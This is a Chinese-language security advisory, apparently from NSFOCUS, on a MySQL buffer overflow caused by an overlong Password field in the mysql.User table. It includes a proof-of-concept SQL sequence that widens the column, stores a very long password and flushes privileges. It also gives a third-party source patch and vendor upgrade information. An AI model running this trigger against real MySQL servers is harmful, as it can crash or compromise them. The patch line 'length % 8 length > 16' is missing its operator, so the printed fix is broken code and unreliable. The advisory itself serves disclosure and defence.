|
MySQL超长Password字段缓冲区溢出漏洞(2)
链接 http://marc.theaimsgroup.com/?l=bugtraq&m=106323221912927&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jedi/Sector One (j@pureftpd.org)提供了如下测试方法:
> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* MySQL 4.0.14第三方补丁如下:
--- mysql-4.0.14-old/sql/sql_acl.cc 2003-07-18 16:57:25.000000000 +0200
+++ mysql-4.0.14/sql/sql_acl.cc 2003-09-10 23:21:13.559759576 +0200
-233,7 +233,7
"Found old style password for user '%s'. Ignoring user. (You may want to restart mysqld using --old-protocol)",
user.user ? user.user : ""); /* purecov: tested */
}
- else if (length % 8) // This holds true for passwords
+ else if (length % 8 length > 16) // This holds true for passwords
{
sql_print_error(
"Found invalid password for user: '%s%s'; Ignoring user",
厂商补丁:
MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到MySQL 4.0.15:
http://www.mysql.com/downloads/mysql-4.0.html
|
